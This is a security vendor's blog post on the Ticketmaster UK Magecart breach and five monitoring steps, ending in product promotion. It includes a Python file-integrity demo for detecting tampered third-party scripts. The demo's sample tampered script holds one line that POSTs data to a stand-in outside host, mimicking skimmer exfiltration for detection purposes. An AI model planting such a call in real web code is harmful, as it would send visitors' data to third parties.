Security Information & Event Management Blog | SIEM

TicketMaster UK Breach, the GDPR aftermath, and 5 things you can do to avoid these costly mistakes

in compliance standards, IBM Systems Magazine, GDPR / by Tony Perri

In early June 2018, Ticketmaster UK admitted to a widespread security breach that it says left 40,000 customers’ data vulnerable to theft. According to RiskIQ[1] and the British bank Monzo, the breach possibly spanned a window as long as eight months, in the months before and after the GDPR went into effect. According to RiskIQ, the dates range from December 2017 until July 2018, shortly after Ticketmaster admitted to the breach.

The details of the breach are still emerging, but the malware responsible for the compromised data is part of a larger card-skimming effort, possibly the largest ever recorded. This story is one for cyber security professionals around the world to watch: first, because the card-skimming malware known as Magecart is a very real threat to ecommerce and is still at large, and second, because this is the first high-profile breach to make headlines in the GDPR era. In fact, companies affected by this malicious script are likely unaware that they are under attack (right this second!) and won’t discover the breach until potentially catastrophic amounts of data have been compromised.

The IBM/Ponemon Cost of a Data Breach Study reported in 2017 that the average time it took US cyber security professionals to discover a breach was 191 days. In the 2018 report, the average rose to 197 days; we are getting worse at fighting cyber-crime. And RiskIQ’s investigation into the Ticketmaster UK breach found several companies that were still running the malicious code but had neither reported a breach nor taken remediation steps. Presumably they were unaware.

Click here to watch Correlog/IBM Systems Magazine GDPR Webinar

The infected code in question came from one of Ticketmaster’s third-party vendors, Inbenta, an AI company that supplied custom JavaScript to Ticketmaster for the chatbot functionality on its website. Card skimmers have become more common in ecommerce in recent years; in the past they were injected into the code of specific websites. Now attackers have found an easier way to collect card data: infiltrating the providers of third-party software code. Instead of compromising one website at a time, an attacker who infiltrates a software supplier can affect every company that supplier sold to.

Third-party breaches that penetrate network infrastructure are tricky to mitigate. It is common for large companies to buy software from smaller vendors to extend the functionality of their own networks. However, when the security ecosystem of a large company far surpasses that of one of its suppliers, the supplier’s vulnerabilities suddenly and tragically become the larger company’s own.

Inbenta has not provided the public with the details of how its systems were compromised, but we do know certain steps that could have been taken in this case, by both Inbenta and Ticketmaster, that could have dramatically reduced the scale of the breach. UK’s The Times reports that Ticketmaster’s fines under the GDPR could reach up to €20 million, the post-GDPR maximum. Real-time breach notification might have reduced the fine, but the time taken to discover the breach was simply too long.

With the Magecart scam still active and the constant threat of cyber attacks on the horizon, here are five steps that could save you from a long and costly security breach like Ticketmaster’s.

1. Have good File Integrity Monitoring (FIM) in place across both mainframe and distributed systems. A security team with FIM in place will see any attempt to alter (or even view) the pristine state of your servers’ operating systems.
2. Have port-monitoring software in place. Any exfiltrated data sent or received through a watched port will notify your security admin, or better yet trigger automation that closes the port.
3. Monitor IP addresses with IP filtering and Network Address Translation to better understand intrusion points from apps and web servers.
4. Keep log data on all of these things, especially on third-party network access points.
5. Lastly, make sure the log data is run through a correlation engine. If one of your systems is cloned, criminals might be able to fool your security systems, but with correlation software you can see whether the cloned system’s behavior is anomalous compared with the systems you know to have normal activity.
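As an added example (not CorreLog’s product and not code from the original post), here is a minimal version of step 1 in Python, extended to the third-party-script problem the post describes: snapshot the hashes of the web assets you serve, diff a later snapshot against it, and, when a vendor script has changed, list the hosts the new version references that the vetted one did not. The directory layout and hostnames are constructed for the demo.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Hostnames a script talks to; used to explain *what* changed in a modified file.
HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")

def sha256_file(path):
    """SHA-256 of one file's bytes (fine for web assets of modest size)."""
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()

def build_snapshot(root):
    """Map every file under root: relative POSIX path -> sha256 hex digest."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}

def compare_snapshots(baseline, current):
    """Files added, removed or modified between two snapshots."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in current
                           if p in baseline and current[p] != baseline[p]),
    }

def new_external_hosts(old_text, new_text):
    """Hosts referenced by the new script text but absent from the old one."""
    return sorted(set(HOST_RE.findall(new_text)) - set(HOST_RE.findall(old_text)))

def demo():
    """Constructed scenario (hostnames are made up): a vendor chatbot script
    is silently replaced by a version that also posts to an unfamiliar host."""
    clean = "fetch('https://chat.vendor.example/api/session');\n"
    tampered = clean + "fetch('https://unfamiliar-host.example/c', {method: 'POST'});\n"
    with tempfile.TemporaryDirectory() as root:
        script = Path(root) / "js" / "chatbot.js"
        script.parent.mkdir()
        script.write_text(clean)
        baseline = build_snapshot(root)   # taken when the asset was vetted
        script.write_text(tampered)       # the unannounced change
        report = compare_snapshots(baseline, build_snapshot(root))
    hosts = new_external_hosts(clean, tampered) if report["modified"] else []
    return report, hosts
```

In practice the baseline is stored off-box and the comparison runs on a schedule, with any non-empty result raised to the SIEM alongside the port and IP logs from steps 2 to 4.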

It is easy to overlook these steps and leave your company vulnerable. When IT departments are too busy putting out fires to manage the work already in the queue, these necessary security measures are easily overlooked. However, maintaining your cyber-security policies does not need to be complicated or costly. CorreLog Products are the most cost-effective, easy-to-use tools that offer set-and-forget software for your security operations. To learn more about CorreLog’s full suite of data security solutions for Windows/UNIX and Mainframe systems visit
